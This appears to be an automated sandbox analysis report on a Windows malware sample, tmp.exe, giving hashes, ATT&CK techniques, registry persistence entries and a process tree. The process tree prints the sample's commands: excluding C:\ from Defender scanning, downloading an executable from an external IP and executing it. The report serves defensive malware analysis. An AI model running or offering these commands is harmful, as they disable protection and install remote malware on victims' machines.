2e6eec60e1698f2b981cd6ced0c3fdefd1e138fc7b339173a8baaac0f72e693e

General

Target

tmp.exe
Size

159KB
MD5

631e3a269c0fec1d7c7de2c2e6d49ad4
SHA1

70687c4110fea9d1774c9f1487206ce80af9186d
SHA256

2e6eec60e1698f2b981cd6ced0c3fdefd1e138fc7b339173a8baaac0f72e693e
SHA512

65c9f20640753867795b85434075998fb53bf83cbb2cab1aafd8f9f0786afefbe83028e95dfc82be3db6ee48979e512c777e11c5a6948223313e0b9aa1731a6a
SSDEEP

3072:zahKyd2n3165vWp1icKAArDZz4N9GhbkENEkeUrhL6:zahOzp0yN90vE

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	tmp.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2092	powershell.exe
2220	powershell.exe
2296	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3020 wrote to memory of 2004	3020	tmp.exe	27
PID 3020 wrote to memory of 2004	3020	tmp.exe	27
PID 3020 wrote to memory of 2004	3020	tmp.exe	27
PID 2004 wrote to memory of 2092	2004	cmd.exe	29
PID 2004 wrote to memory of 2092	2004	cmd.exe	29
PID 2004 wrote to memory of 2092	2004	cmd.exe	29
PID 2004 wrote to memory of 2220	2004	cmd.exe	30
PID 2004 wrote to memory of 2220	2004	cmd.exe	30
PID 2004 wrote to memory of 2220	2004	cmd.exe	30
PID 2004 wrote to memory of 2296	2004	cmd.exe	31
PID 2004 wrote to memory of 2296	2004	cmd.exe	31
PID 2004 wrote to memory of 2296	2004	cmd.exe	31

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Windows\system32\cmd.exe
  cmd.exe /c "resources.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath "'C:\'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "wget "http://103.136.199.131:82/asklmdklsmqkl.exe" -outfile "C:\Users\Admin\AppData\Roaming\FgnmkAm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-Expression -Command "C:\Users\Admin\AppData\Roaming\FgnmkAm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2296

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\resources.bat

Filesize
351B

MD5
2682a06d030068f291bf0181bc8f66b6

SHA1
c154ba272ea11225e0596b7f47d556135ad90b43

SHA256
2d6110a6f318c2d46bf7a38c07f9b0d95829e28a3888e5023c5e496dfe45c23a

SHA512
43c116b85c5767b401f1404d535c15080b99b79ce6678b35c5038001e1d283f0df921df6baebd9b377498b35a74b12bda53989996d3fb683485b6a8b365dedd8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
21777bbd38230dc23ab3664f13e7d726

SHA1
1146d0e9efc56e8a45accb6a5ecaa6c8b734ce4c

SHA256
ccff04d4e0cc33b8a7ba829a82bd423413410e702a69e5115176670dcbccb986

SHA512
aa752f7c37357de25490aaf1bd0221c239358ba110ee7e7fd4b589da75d6dffb1539ed84935f1508e0b2431983f76b7e8c3da826f309846718cb3aa1ff209b24

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
21777bbd38230dc23ab3664f13e7d726

SHA1
1146d0e9efc56e8a45accb6a5ecaa6c8b734ce4c

SHA256
ccff04d4e0cc33b8a7ba829a82bd423413410e702a69e5115176670dcbccb986

SHA512
aa752f7c37357de25490aaf1bd0221c239358ba110ee7e7fd4b589da75d6dffb1539ed84935f1508e0b2431983f76b7e8c3da826f309846718cb3aa1ff209b24

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7G8NRBM0XHI12WFS4PUQ.temp

Filesize
7KB

MD5
21777bbd38230dc23ab3664f13e7d726

SHA1
1146d0e9efc56e8a45accb6a5ecaa6c8b734ce4c

SHA256
ccff04d4e0cc33b8a7ba829a82bd423413410e702a69e5115176670dcbccb986

SHA512
aa752f7c37357de25490aaf1bd0221c239358ba110ee7e7fd4b589da75d6dffb1539ed84935f1508e0b2431983f76b7e8c3da826f309846718cb3aa1ff209b24

Download Submit
memory/2092-64-0x0000000002410000-0x0000000002490000-memory.dmp

Filesize
512KB

Download
memory/2092-66-0x000000000241B000-0x0000000002452000-memory.dmp

Filesize
220KB

Download
memory/2092-65-0x0000000002410000-0x0000000002490000-memory.dmp

Filesize
512KB

Download
memory/2092-63-0x0000000002410000-0x0000000002490000-memory.dmp

Filesize
512KB

Download
memory/2092-62-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/2092-61-0x000000001B120000-0x000000001B402000-memory.dmp

Filesize
2.9MB

Download
memory/2220-72-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/2220-73-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/2220-74-0x00000000023A0000-0x0000000002420000-memory.dmp

Filesize
512KB

Download
memory/2220-75-0x00000000023A0000-0x0000000002420000-memory.dmp

Filesize
512KB

Download
memory/2220-76-0x00000000023AB000-0x00000000023E2000-memory.dmp

Filesize
220KB

Download
memory/2296-83-0x0000000002744000-0x0000000002747000-memory.dmp

Filesize
12KB

Download
memory/2296-84-0x000000000274B000-0x0000000002782000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing